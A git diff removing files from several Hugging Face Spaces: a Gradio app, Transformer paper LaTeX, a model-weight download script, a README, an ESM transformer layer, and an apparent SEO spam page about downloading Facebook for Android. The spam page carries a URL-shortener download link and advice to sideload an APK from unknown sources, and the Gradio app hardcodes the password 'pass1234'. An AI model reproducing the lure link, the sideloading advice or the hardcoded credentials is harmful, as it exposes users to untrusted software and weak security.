929948d72514cf929dc25e7ab41f0c014b0ef17d..0000000000000000000000000000000000000000 --- a/spaces/serhatderya/controlnet_v11_scribble_ui/app.py +++ /dev/null @@ -1,4 +0,0 
@@ -import gradio as gr - -demo = gr.load("serhatderya/konseptai_scribble", src="spaces") -demo.launch(auth=("admin", "pass1234")) \ No newline at end of file diff --git a/spaces/shencc/gpt/crazy_functions/test_project/latex/attention/model_architecture.tex b/spaces/shencc/gpt/crazy_functions/test_project/latex/attention/model_architecture.tex deleted file mode 100644 index c82be6242cc9d26203360e90d3ac9184ef6ad842..0000000000000000000000000000000000000000 --- a/spaces/shencc/gpt/crazy_functions/test_project/latex/attention/model_architecture.tex +++ /dev/null @@ -1,155 +0,0 @@ - -\begin{figure} - \centering - \includegraphics[scale=0.6]{Figures/ModalNet-21} - \caption{The Transformer - model architecture.} - \label{fig:model-arch} -\end{figure} - -% Although the primary workhorse of our model is attention, -%Our model maintains the encoder-decoder structure that is common to many so-called sequence-to-sequence models \citep{bahdanau2014neural,sutskever14}. As in all such architectures, the encoder computes a representation of the input sequence, and the decoder consumes these representations along with the output tokens to autoregressively produce the output sequence. Where, traditionally, the encoder and decoder contain stacks of recurrent or convolutional layers, our encoder and decoder stacks are composed of attention layers and position-wise feed-forward layers (Figure~\ref{fig:model-arch}). The following sections describe the gross architecture and these particular components in detail. - -Most competitive neural sequence transduction models have an encoder-decoder structure \citep{cho2014learning,bahdanau2014neural,sutskever14}. Here, the encoder maps an input sequence of symbol representations $(x_1, ..., x_n)$ to a sequence of continuous representations $\mathbf{z} = (z_1, ..., z_n)$. Given $\mathbf{z}$, the decoder then generates an output sequence $(y_1,...,y_m)$ of symbols one element at a time. 
At each step the model is auto-regressive \citep{graves2013generating}, consuming the previously generated symbols as additional input when generating the next. - -The Transformer follows this overall architecture using stacked self-attention and point-wise, fully connected layers for both the encoder and decoder, shown in the left and right halves of Figure~\ref{fig:model-arch}, respectively. - -\subsection{Encoder and Decoder Stacks} - -\paragraph{Encoder:}The encoder is composed of a stack of $N=6$ identical layers. Each layer has two sub-layers. The first is a multi-head self-attention mechanism, and the second is a simple, position-wise fully connected feed-forward network. We employ a residual connection \citep{he2016deep} around each of the two sub-layers, followed by layer normalization \cite{layernorm2016}. That is, the output of each sub-layer is $\mathrm{LayerNorm}(x + \mathrm{Sublayer}(x))$, where $\mathrm{Sublayer}(x)$ is the function implemented by the sub-layer itself. To facilitate these residual connections, all sub-layers in the model, as well as the embedding layers, produce outputs of dimension $\dmodel=512$. - -\paragraph{Decoder:}The decoder is also composed of a stack of $N=6$ identical layers. In addition to the two sub-layers in each encoder layer, the decoder inserts a third sub-layer, which performs multi-head attention over the output of the encoder stack. Similar to the encoder, we employ residual connections around each of the sub-layers, followed by layer normalization. We also modify the self-attention sub-layer in the decoder stack to prevent positions from attending to subsequent positions. This masking, combined with fact that the output embeddings are offset by one position, ensures that the predictions for position $i$ can depend only on the known outputs at positions less than $i$. 
- -% In our model (Figure~\ref{fig:model-arch}), the encoder and decoder are composed of stacks of alternating self-attention layers (for cross-positional communication) and position-wise feed-forward layers (for in-place computation). In addition, the decoder stack contains encoder-decoder attention layers. Since attention is agnostic to the distances between words, our model requires a "positional encoding" to be added to the encoder and decoder input. The following sections describe all of these components in detail. - -\subsection{Attention} \label{sec:attention} -An attention function can be described as mapping a query and a set of key-value pairs to an output, where the query, keys, values, and output are all vectors. The output is computed as a weighted sum of the values, where the weight assigned to each value is computed by a compatibility function of the query with the corresponding key. - -\subsubsection{Scaled Dot-Product Attention} \label{sec:scaled-dot-prod} - -% \begin{figure} -% \centering -% \includegraphics[scale=0.6]{Figures/ModalNet-19} -% \caption{Scaled Dot-Product Attention.} -% \label{fig:multi-head-att} -% \end{figure} - -We call our particular attention "Scaled Dot-Product Attention" (Figure~\ref{fig:multi-head-att}). The input consists of queries and keys of dimension $d_k$, and values of dimension $d_v$. We compute the dot products of the query with all keys, divide each by $\sqrt{d_k}$, and apply a softmax function to obtain the weights on the values. - -In practice, we compute the attention function on a set of queries simultaneously, packed together into a matrix $Q$. The keys and values are also packed together into matrices $K$ and $V$. We compute the matrix of outputs as: - -\begin{equation} - \mathrm{Attention}(Q, K, V) = \mathrm{softmax}(\frac{QK^T}{\sqrt{d_k}})V -\end{equation} - -The two most commonly used attention functions are additive attention \citep{bahdanau2014neural}, and dot-product (multiplicative) attention. 
Dot-product attention is identical to our algorithm, except for the scaling factor of $\frac{1}{\sqrt{d_k}}$. Additive attention computes the compatibility function using a feed-forward network with a single hidden layer. While the two are similar in theoretical complexity, dot-product attention is much faster and more space-efficient in practice, since it can be implemented using highly optimized matrix multiplication code. - -%We scale the dot products by $1/\sqrt{d_k}$ to limit the magnitude of the dot products, which works well in practice. Otherwise, we found applying the softmax to often result in weights very close to 0 or 1, and hence minuscule gradients. - -% Already described in the subsequent section -%When used as part of decoder self-attention, an optional mask function is applied just before the softmax to prevent positions from attending to subsequent positions. This mask simply sets the logits corresponding to all illegal connections (those outside of the lower triangle) to $-\infty$. - -%\paragraph{Comparison to Additive Attention: } We choose dot product attention over additive attention \citep{bahdanau2014neural} since it can be computed using highly optimized matrix multiplication code. This optimization is particularly important to us, as we employ many attention layers in our model. - -While for small values of $d_k$ the two mechanisms perform similarly, additive attention outperforms dot product attention without scaling for larger values of $d_k$ \citep{DBLP:journals/corr/BritzGLL17}. We suspect that for large values of $d_k$, the dot products grow large in magnitude, pushing the softmax function into regions where it has extremely small gradients \footnote{To illustrate why the dot products get large, assume that the components of $q$ and $k$ are independent random variables with mean $0$ and variance $1$. Then their dot product, $q \cdot k = \sum_{i=1}^{d_k} q_ik_i$, has mean $0$ and variance $d_k$.}. 
To counteract this effect, we scale the dot products by $\frac{1}{\sqrt{d_k}}$. - - -%We suspect this to be caused by the dot products growing too large in magnitude to result in useful gradients after applying the softmax function. To counteract this, we scale the dot product by $1/\sqrt{d_k}$. - - -\subsubsection{Multi-Head Attention} \label{sec:multihead} - -\begin{figure} -\begin{minipage}[t]{0.5\textwidth} - \centering - Scaled Dot-Product Attention \\ - \vspace{0.5cm} - \includegraphics[scale=0.6]{Figures/ModalNet-19} -\end{minipage} -\begin{minipage}[t]{0.5\textwidth} - \centering - Multi-Head Attention \\ - \vspace{0.1cm} - \includegraphics[scale=0.6]{Figures/ModalNet-20} -\end{minipage} - - - % \centering - - \caption{(left) Scaled Dot-Product Attention. (right) Multi-Head Attention consists of several attention layers running in parallel.} - \label{fig:multi-head-att} -\end{figure} - -Instead of performing a single attention function with $\dmodel$-dimensional keys, values and queries, we found it beneficial to linearly project the queries, keys and values $h$ times with different, learned linear projections to $d_k$, $d_k$ and $d_v$ dimensions, respectively. -On each of these projected versions of queries, keys and values we then perform the attention function in parallel, yielding $d_v$-dimensional output values. These are concatenated and once again projected, resulting in the final values, as depicted in Figure~\ref{fig:multi-head-att}. - -Multi-head attention allows the model to jointly attend to information from different representation subspaces at different positions. With a single attention head, averaging inhibits this. 
- -\begin{align*} - \mathrm{MultiHead}(Q, K, V) &= \mathrm{Concat}(\mathrm{head_1}, ..., \mathrm{head_h})W^O\\ -% \mathrm{where} \mathrm{head_i} &= \mathrm{Attention}(QW_Q_i^{\dmodel \times d_q}, KW_K_i^{\dmodel \times d_k}, VW^V_i^{\dmodel \times d_v})\\ - \text{where}~\mathrm{head_i} &= \mathrm{Attention}(QW^Q_i, KW^K_i, VW^V_i)\\ -\end{align*} - -Where the projections are parameter matrices $W^Q_i \in \mathbb{R}^{\dmodel \times d_k}$, $W^K_i \in \mathbb{R}^{\dmodel \times d_k}$, $W^V_i \in \mathbb{R}^{\dmodel \times d_v}$ and $W^O \in \mathbb{R}^{hd_v \times \dmodel}$. - - -%find it better (and no more expensive) to have multiple parallel attention layers (each over the full set of positions) with proportionally lower-dimensional keys, values and queries. We call this "Multi-Head Attention" (Figure~\ref{fig:multi-head-att}). The keys, values, and queries for each of these parallel attention layers are computed by learned linear transformations of the inputs to the multi-head attention. We use different linear transformations across different parallel attention layers. The output of the parallel attention layers are concatenated, and then passed through a final learned linear transformation. - -In this work we employ $h=8$ parallel attention layers, or heads. For each of these we use $d_k=d_v=\dmodel/h=64$. -Due to the reduced dimension of each head, the total computational cost is similar to that of single-head attention with full dimensionality. - -\subsubsection{Applications of Attention in our Model} - -The Transformer uses multi-head attention in three different ways: -\begin{itemize} - \item In "encoder-decoder attention" layers, the queries come from the previous decoder layer, and the memory keys and values come from the output of the encoder. This allows every position in the decoder to attend over all positions in the input sequence. 
This mimics the typical encoder-decoder attention mechanisms in sequence-to-sequence models such as \citep{wu2016google, bahdanau2014neural,JonasFaceNet2017}. - - \item The encoder contains self-attention layers. In a self-attention layer all of the keys, values and queries come from the same place, in this case, the output of the previous layer in the encoder. Each position in the encoder can attend to all positions in the previous layer of the encoder. - - \item Similarly, self-attention layers in the decoder allow each position in the decoder to attend to all positions in the decoder up to and including that position. We need to prevent leftward information flow in the decoder to preserve the auto-regressive property. We implement this inside of scaled dot-product attention by masking out (setting to $-\infty$) all values in the input of the softmax which correspond to illegal connections. See Figure~\ref{fig:multi-head-att}. - -\end{itemize} - -\subsection{Position-wise Feed-Forward Networks}\label{sec:ffn} - -In addition to attention sub-layers, each of the layers in our encoder and decoder contains a fully connected feed-forward network, which is applied to each position separately and identically. This consists of two linear transformations with a ReLU activation in between. - -\begin{equation} - \mathrm{FFN}(x)=\max(0, xW_1 + b_1) W_2 + b_2 -\end{equation} - -While the linear transformations are the same across different positions, they use different parameters from layer to layer. Another way of describing this is as two convolutions with kernel size 1. The dimensionality of input and output is $\dmodel=512$, and the inner-layer has dimensionality $d_{ff}=2048$. - - - -%In the appendix, we describe how the position-wise feed-forward network can also be seen as a form of attention. 
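The attention functions defined in this section reduce to a few lines of array code. The following NumPy sketch of scaled dot-product attention and the multi-head wrapper is illustrative only: the `params` layout, the toy dimensions ($\dmodel=64$, $h=4$, so $d_k=d_v=16$), and the random weights are assumptions for the example, not the paper's implementation.

```python
import numpy as np

def softmax(x):
    # Numerically stabilized softmax over the last axis.
    e = np.exp(x - x.max(axis=-1, keepdims=True))
    return e / e.sum(axis=-1, keepdims=True)

def attention(Q, K, V):
    # Scaled dot-product attention: softmax(Q K^T / sqrt(d_k)) V.
    d_k = Q.shape[-1]
    return softmax(Q @ K.T / np.sqrt(d_k)) @ V

def multi_head_attention(x, params):
    # Project x into each head's (Q, K, V), attend, concatenate, project back.
    heads = [attention(x @ W_Q, x @ W_K, x @ W_V)
             for W_Q, W_K, W_V in params["heads"]]
    return np.concatenate(heads, axis=-1) @ params["W_O"]

rng = np.random.default_rng(0)
d_model, h, seq = 64, 4, 10
d_k = d_model // h
params = {
    "heads": [tuple(rng.normal(size=(d_model, d_k)) for _ in range(3))
              for _ in range(h)],
    "W_O": rng.normal(size=(h * d_k, d_model)),
}
x = rng.normal(size=(seq, d_model))   # self-attention: Q, K, V all come from x
out = multi_head_attention(x, params)
print(out.shape)                      # (10, 64)
```

Note how the reduced per-head width keeps the cost comparable to one full-width head: each head works in $d_k = \dmodel/h$ dimensions, and concatenation restores $\dmodel$ before the output projection.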
- -%from Jakob: The number of operations required for the model to relate signals from two arbitrary input or output positions grows in the distance between positions in input or output, linearly for ConvS2S and logarithmically for ByteNet, making it harder to learn dependencies between these positions \citep{hochreiter2001gradient}. In the transformer this is reduced to a constant number of operations, albeit at the cost of effective resolution caused by averaging attention-weighted positions, an effect we aim to counteract with multi-headed attention. - - -%Figure~\ref{fig:simple-att} presents a simple attention function, $A$, with a single head, that forms the basis of our multi-head attention. $A$ takes a query key vector $\kq$, matrices of memory keys $\km$ and memory values $\vm$ ,and produces a query value vector $\vq$ as -%\begin{equation*} \label{eq:attention} -% A(\kq, \km, \vm) = {\vm}^T (Softmax(\km \kq). -%\end{equation*} -%We linearly transform $\kq,\,\km$, and $\vm$ with learned matrices ${\Wkq \text{,} \, \Wkm}$, and ${\Wvm}$ before calling the attention function, and transform the output query with $\Wvq$ before handing it to the feed forward layer. Each attention layer has it's own set of transformation matrices, which are shared across all query positions. $A$ is applied in parallel for each query position, and is implemented very efficiently as a batch of matrix multiplies. The self-attention and encoder-decoder attention layers use $A$, but with different arguments. For example, in encdoder self-attention, queries in encoder layer $i$ attention to memories in encoder layer $i-1$. To ensure that decoder self-attention layers do not look at future words, we add $- \inf$ to the softmax logits in positions $j+1$ to query length for query position $l$. - -%In simple attention, the query value is a weighted combination of the memory values where the attention weights sum to one. 
Although this function performs well in practice, the constraint on attention weights can restrict the amount of information that flows from memories to queries because the query cannot focus on multiple memory positions at once, which might be desirable when translating long sequences. \marginpar{@usz, could you think of an example of this ?} We remedy this by maintaining multiple attention heads at each query position that attend to all memory positions in parallel, with a different set of parameters per attention head $h$. -%\marginpar{} - -\subsection{Embeddings and Softmax} -Similarly to other sequence transduction models, we use learned embeddings to convert the input tokens and output tokens to vectors of dimension $\dmodel$. We also use the usual learned linear transformation and softmax function to convert the decoder output to predicted next-token probabilities. In our model, we share the same weight matrix between the two embedding layers and the pre-softmax linear transformation, similar to \citep{press2016using}. In the embedding layers, we multiply those weights by $\sqrt{\dmodel}$. - - -\subsection{Positional Encoding} -Since our model contains no recurrence and no convolution, in order for the model to make use of the order of the sequence, we must inject some information about the relative or absolute position of the tokens in the sequence. To this end, we add "positional encodings" to the input embeddings at the bottoms of the encoder and decoder stacks. The positional encodings have the same dimension $\dmodel$ as the embeddings, so that the two can be summed. There are many choices of positional encodings, learned and fixed \citep{JonasFaceNet2017}. - -In this work, we use sine and cosine functions of different frequencies: - -\begin{align*} - PE_{(pos,2i)} &= \sin(pos / 10000^{2i/\dmodel}) \\ - PE_{(pos,2i+1)} &= \cos(pos / 10000^{2i/\dmodel}) -\end{align*} - -where $pos$ is the position and $i$ is the dimension. 
That is, each dimension of the positional encoding corresponds to a sinusoid. The wavelengths form a geometric progression from $2\pi$ to $10000 \cdot 2\pi$. We chose this function because we hypothesized it would allow the model to easily learn to attend by relative positions, since for any fixed offset $k$, $PE_{pos+k}$ can be represented as a linear function of $PE_{pos}$. - -We also experimented with using learned positional embeddings \citep{JonasFaceNet2017} instead, and found that the two versions produced nearly identical results (see Table~\ref{tab:variations} row (E)). We chose the sinusoidal version because it may allow the model to extrapolate to sequence lengths longer than the ones encountered during training. diff --git a/spaces/shiwan10000/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py b/spaces/shiwan10000/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py deleted file mode 100644 index 7df5be6fc260394ee9bbd0a7ae377e2ca657fe83..0000000000000000000000000000000000000000 --- a/spaces/shiwan10000/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py +++ /dev/null @@ -1,60 +0,0 @@ -import argparse -import os -from os import path as osp - -# from basicsr.utils.download_util import download_file_from_google_drive -import gdown - - -def download_pretrained_models(method, file_ids): - save_path_root = f'./weights/{method}' - os.makedirs(save_path_root, exist_ok=True) - - for file_name, file_id in file_ids.items(): - file_url = 'https://drive.google.com/uc?id='+file_id - save_path = osp.abspath(osp.join(save_path_root, file_name)) - if osp.exists(save_path): - user_response = input(f'{file_name} already exists. Do you want to overwrite it? 
Y/N\n') - if user_response.lower() == 'y': - print(f'Overwriting {file_name} at {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - elif user_response.lower() == 'n': - print(f'Skipping {file_name}') - else: - raise ValueError('Wrong input. Only accepts Y/N.') - else: - print(f'Downloading {file_name} to {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - - parser.add_argument( - 'method', - type=str, - help=("Options: 'CodeFormer', 'facelib'. Set to 'all' to download all the models.")) - args = parser.parse_args() - - # file name: file id - # 'dlib': { - # 'mmod_human_face_detector-4cb19393.dat': '1qD-OqY8M6j4PWUP_FtqfwUPFPRMu6ubX', - # 'shape_predictor_5_face_landmarks-c4b1e980.dat': '1vF3WBUApw4662v9Pw6wke3uk1qxnmLdg', - # 'shape_predictor_68_face_landmarks-fbdc2cb8.dat': '1tJyIVdCHaU6IDMDx86BZCxLGZfsWB8yq' - # } - file_ids = { - 'CodeFormer': { - 'codeformer.pth': '1v_E_vZvP-dQPF55Kc5SRCjaKTQXDz-JB' - }, - 'facelib': { - 'yolov5l-face.pth': '131578zMA6B2x8VQHyHfa6GEPtulMCNzV', - 'parsing_parsenet.pth': '16pkohyZZ8ViHGBk3QtVqxLZKzdo466bK' - } - } - - if args.method == 'all': - for method in file_ids.keys(): - download_pretrained_models(method, file_ids[method]) - else: - download_pretrained_models(args.method, file_ids[args.method]) \ No newline at end of file diff --git a/spaces/sil-ai/aqua-comprehensibility/README.md b/spaces/sil-ai/aqua-comprehensibility/README.md deleted file mode 100644 index 2469b226a7101070c4b85c58073a3a2e262ecab7..0000000000000000000000000000000000000000 --- a/spaces/sil-ai/aqua-comprehensibility/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: AQuA Comprehensibility -emoji: 💦 -colorFrom: purple -colorTo: green -sdk: gradio -sdk_version: 2.9.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at 
https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/transformer_layer.py b/spaces/simonduerr/diffdock/esm/esm/inverse_folding/transformer_layer.py deleted file mode 100644 index 55f4305c0671bfc0481974ee32f4dd1d6fb03533..0000000000000000000000000000000000000000 --- a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/transformer_layer.py +++ /dev/null @@ -1,304 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# Contents of this file were adapted from the open source fairseq repository. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from typing import Dict, List, Optional - -import torch -import torch.nn as nn -import torch.nn.functional as F -from esm.multihead_attention import MultiheadAttention -from torch import Tensor - - -class TransformerEncoderLayer(nn.Module): - """Encoder layer block. - `layernorm -> dropout -> add residual` - - Args: - args (argparse.Namespace): parsed command-line arguments - """ - - def __init__(self, args): - super().__init__() - self.args = args - self.embed_dim = args.encoder_embed_dim - self.self_attn = self.build_self_attention(self.embed_dim, args) - self.self_attn_layer_norm = torch.nn.LayerNorm(self.embed_dim) - self.dropout_module = nn.Dropout(args.dropout) - self.activation_fn = F.relu - self.fc1 = self.build_fc1( - self.embed_dim, - args.encoder_ffn_embed_dim, - ) - self.fc2 = self.build_fc2( - args.encoder_ffn_embed_dim, - self.embed_dim, - ) - - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - - def build_fc1(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_fc2(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_self_attention(self, embed_dim, args): - return MultiheadAttention( - embed_dim, - args.encoder_attention_heads, - dropout=args.attention_dropout, - self_attention=True, - ) - - def 
residual_connection(self, x, residual): - return residual + x - - def forward( - self, - x, - encoder_padding_mask: Optional[Tensor], - attn_mask: Optional[Tensor] = None, - ): - """ - Args: - x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - encoder_padding_mask (ByteTensor): binary ByteTensor of shape - `(batch, seq_len)` where padding elements are indicated by ``1``. - attn_mask (ByteTensor): binary tensor of shape `(tgt_len, src_len)`, - where `tgt_len` is the length of output and `src_len` is the - length of input, though here both are equal to `seq_len`. - `attn_mask[tgt_i, src_j] = 1` means that when calculating the - embedding for `tgt_i`, we exclude (mask out) `src_j`. This is - useful for strided self-attention. - - Returns: - encoded output of shape `(seq_len, batch, embed_dim)` - """ - # anything in original attn_mask = 1, becomes -1e8 - # anything in original attn_mask = 0, becomes 0 - # Note that we cannot use -inf here, because at some edge cases, - # the attention weight (before softmax) for some padded element in query - # will become -inf, which results in NaN in model parameters - if attn_mask is not None: - attn_mask = attn_mask.masked_fill( - attn_mask.to(torch.bool), -1e8 if x.dtype == torch.float32 else -1e4 - ) - - residual = x - x = self.self_attn_layer_norm(x) - x, _ = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=encoder_padding_mask, - need_weights=False, - attn_mask=attn_mask, - ) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - - residual = x - x = self.final_layer_norm(x) - x = self.activation_fn(self.fc1(x)) - x = self.fc2(x) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - return x - - -class TransformerDecoderLayer(nn.Module): - """Decoder layer block. 
- `layernorm -> dropout -> add residual` - - Args: - args (argparse.Namespace): parsed command-line arguments - no_encoder_attn (bool, optional): whether to attend to encoder outputs - (default: False). - """ - - def __init__( - self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False - ): - super().__init__() - self.embed_dim = args.decoder_embed_dim - self.dropout_module = nn.Dropout(args.dropout) - - self.self_attn = self.build_self_attention( - self.embed_dim, - args, - add_bias_kv=add_bias_kv, - add_zero_attn=add_zero_attn, - ) - self.nh = self.self_attn.num_heads - self.head_dim = self.self_attn.head_dim - - self.activation_fn = F.relu - - self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim) - - if no_encoder_attn: - self.encoder_attn = None - self.encoder_attn_layer_norm = None - else: - self.encoder_attn = self.build_encoder_attention(self.embed_dim, args) - self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim) - - self.ffn_layernorm = ( - nn.LayerNorm(args.decoder_ffn_embed_dim) - if getattr(args, "scale_fc", False) - else None - ) - self.w_resid = ( - nn.Parameter( - torch.ones( - self.embed_dim, - ), - requires_grad=True, - ) - if getattr(args, "scale_resids", False) - else None - ) - - self.fc1 = self.build_fc1( - self.embed_dim, - args.decoder_ffn_embed_dim, - ) - self.fc2 = self.build_fc2( - args.decoder_ffn_embed_dim, - self.embed_dim, - ) - - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - self.need_attn = True - - def build_fc1(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_fc2(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_self_attention( - self, embed_dim, args, add_bias_kv=False, add_zero_attn=False - ): - return MultiheadAttention( - embed_dim, - args.decoder_attention_heads, - dropout=args.attention_dropout, - add_bias_kv=add_bias_kv, - add_zero_attn=add_zero_attn, - self_attention=True, - ) - - def build_encoder_attention(self, 
embed_dim, args): - return MultiheadAttention( - embed_dim, - args.decoder_attention_heads, - kdim=args.encoder_embed_dim, - vdim=args.encoder_embed_dim, - dropout=args.attention_dropout, - encoder_decoder_attention=True, - ) - - def residual_connection(self, x, residual): - return residual + x - - def forward( - self, - x, - encoder_out: Optional[torch.Tensor] = None, - encoder_padding_mask: Optional[torch.Tensor] = None, - incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None, - prev_self_attn_state: Optional[List[torch.Tensor]] = None, - prev_attn_state: Optional[List[torch.Tensor]] = None, - self_attn_mask: Optional[torch.Tensor] = None, - self_attn_padding_mask: Optional[torch.Tensor] = None, - need_attn: bool = False, - need_head_weights: bool = False, - ): - """ - Args: - x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - encoder_padding_mask (ByteTensor, optional): binary - ByteTensor of shape `(batch, src_len)` where padding - elements are indicated by ``1``. - need_attn (bool, optional): return attention weights - need_head_weights (bool, optional): return attention weights - for each head (default: return average over heads). 
- - Returns: - encoded output of shape `(seq_len, batch, embed_dim)` - """ - if need_head_weights: - need_attn = True - - residual = x - x = self.self_attn_layer_norm(x) - if prev_self_attn_state is not None: - prev_key, prev_value = prev_self_attn_state[:2] - saved_state: Dict[str, Optional[Tensor]] = { - "prev_key": prev_key, - "prev_value": prev_value, - } - if len(prev_self_attn_state) >= 3: - saved_state["prev_key_padding_mask"] = prev_self_attn_state[2] - assert incremental_state is not None - self.self_attn._set_input_buffer(incremental_state, saved_state) - _self_attn_input_buffer = self.self_attn._get_input_buffer(incremental_state) - y = x - - x, attn = self.self_attn( - query=x, - key=y, - value=y, - key_padding_mask=self_attn_padding_mask, - incremental_state=incremental_state, - need_weights=False, - attn_mask=self_attn_mask, - ) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - - if self.encoder_attn is not None and encoder_out is not None: - residual = x - x = self.encoder_attn_layer_norm(x) - if prev_attn_state is not None: - prev_key, prev_value = prev_attn_state[:2] - saved_state: Dict[str, Optional[Tensor]] = { - "prev_key": prev_key, - "prev_value": prev_value, - } - if len(prev_attn_state) >= 3: - saved_state["prev_key_padding_mask"] = prev_attn_state[2] - assert incremental_state is not None - self.encoder_attn._set_input_buffer(incremental_state, saved_state) - - x, attn = self.encoder_attn( - query=x, - key=encoder_out, - value=encoder_out, - key_padding_mask=encoder_padding_mask, - incremental_state=incremental_state, - static_kv=True, - need_weights=need_attn or (not self.training and self.need_attn), - need_head_weights=need_head_weights, - ) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - - residual = x - x = self.final_layer_norm(x) - - x = self.activation_fn(self.fc1(x)) - if self.ffn_layernorm is not None: - x = self.ffn_layernorm(x) - x = self.fc2(x) - x = self.dropout_module(x) - 
if self.w_resid is not None: - residual = torch.mul(self.w_resid, residual) - x = self.residual_connection(x, residual) - return x, attn, None diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Facebook for Android Tips and Tricks to Enhance Your Experience.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Facebook for Android Tips and Tricks to Enhance Your Experience.md deleted file mode 100644 index 5e3034f0908fc2c0d812b875991739c78f8d2fd4..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Facebook for Android Tips and Tricks to Enhance Your Experience.md +++ /dev/null @@ -1,99 +0,0 @@ -
      -

      How to Download Facebook for Android

      -

      Facebook is one of the most popular social media platforms in the world. It allows you to connect with your friends and family, share updates and photos, follow your favorite pages and groups, play games, watch videos, and more. If you have an Android device, you can download Facebook for free from the Google Play Store or from the Facebook website.

      -

      download android facebook


      DOWNLOADhttps://ssurll.com/2uNVFo



      -

      Benefits of Using Facebook on Android

      -

      Stay connected with friends and family

      -

      With Facebook, you can chat with your friends and family through Messenger, make voice and video calls, send stickers and emojis, create group chats, and join rooms. You can also see what your friends are up to by checking their timelines, stories, and live streams.

      -

      Share updates and photos

      -

      With Facebook, you can express yourself by posting status updates, photos, videos, GIFs, polls, and more. You can also use Facebook emoji to help relay what’s going on in your world. You can choose who can see your posts by adjusting your privacy settings. You can also react to other people’s posts by liking, commenting, or sharing them.

      -

      Follow your favorite pages and groups

      -

      With Facebook, you can follow your favorite celebrities, brands, news sources, artists, or sports teams to get their latest news and updates. You can also join groups that match your interests or hobbies, such as cooking, gaming, gardening, or traveling. You can interact with other members of the groups by posting questions, answers, tips, or feedback.

      -

      How to Download Facebook for Android from Google Play Store

      -

      Open the Google Play Store app on your Android device

      -

      The Google Play Store is the official app store for Android devices. You can find it on your home screen or in your app drawer.

      -

      Search for Facebook in the search bar

      -

      Tap on the search bar at the top of the screen and type in "Facebook". You will see a list of results that match your query.

      -

      Tap on the Facebook app icon and then tap on Install

      -

      The Facebook app icon is a blue square with a white letter "f" inside it. Tap on it to open its details page. Then tap on the green Install button to start downloading the app.

      -

      Wait for the app to download and install on your device

      -

      The download and installation process may take a few minutes depending on your internet speed and device storage. You can see the progress of the download by looking at the progress bar below the Install button.

      -

      How to Download Facebook Lite for Android from Facebook Website

      -

Open your web browser and go to https://www.facebook.com/lite

      -

You can use any modern web browser, such as Chrome, Firefox, or Safari. Then type the URL https://www.facebook.com/lite into the address bar and press Enter.

      -

      Tap on the Download button and then tap on OK

      -

      You will see a blue Download button on the web page. Tap on it to start downloading the Facebook Lite APK file. APK stands for Android Package Kit, which is a file format that contains the app's code and resources. You may see a warning message that says "This type of file can harm your device". Don't worry, this is just a standard message for any APK file that is not from the Google Play Store. Tap on OK to continue.

      -
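As an aside on the file format: an APK is simply a ZIP archive with a conventional internal layout, so any ZIP tool can list what is inside one. A small Python sketch (the entry names below are typical examples for illustration, not the actual contents of the Facebook Lite APK):

```python
import io
import zipfile

# Build a tiny stand-in "APK" in memory. A real APK also carries compiled
# bytecode, resources, and a signature; this only illustrates the container.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as apk:
    apk.writestr("AndroidManifest.xml", "<manifest/>")
    apk.writestr("classes.dex", b"")
    apk.writestr("res/values/strings.xml", "<resources/>")

# Listing the entries works the same way on a downloaded .apk file.
with zipfile.ZipFile(buf) as apk:
    print(apk.namelist())  # ['AndroidManifest.xml', 'classes.dex', 'res/values/strings.xml']
```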

      Go to your Downloads folder and tap on the Facebook Lite APK file

      -

      Once the download is complete, you can find the Facebook Lite APK file in your Downloads folder. You can access it by opening your File Manager app or by swiping down from the top of the screen and tapping on the notification. Tap on the file to open it.

      -

      Tap on Install and then tap on Open

      -

      You may see a message that says "For your security, your phone is not allowed to install unknown apps from this source". This means that you need to enable the permission to install apps from unknown sources. To do this, tap on Settings and then toggle on the switch next to Allow from this source. Then go back to the previous screen and tap on Install. Wait for the app to install on your device. Then tap on Open to launch it.

      -

      Comparison of Facebook and Facebook Lite for Android

      -

      Size and data usage

      -

      One of the main differences between Facebook and Facebook Lite is their size and data usage. Facebook Lite is designed to be smaller and faster than Facebook, especially on low-end devices or slow networks. According to the Google Play Store, Facebook Lite is only about 2 MB in size, while Facebook is about 40 MB. This means that Facebook Lite takes up less space on your device and consumes less data when downloading or updating.

      -

      Features and performance

      -

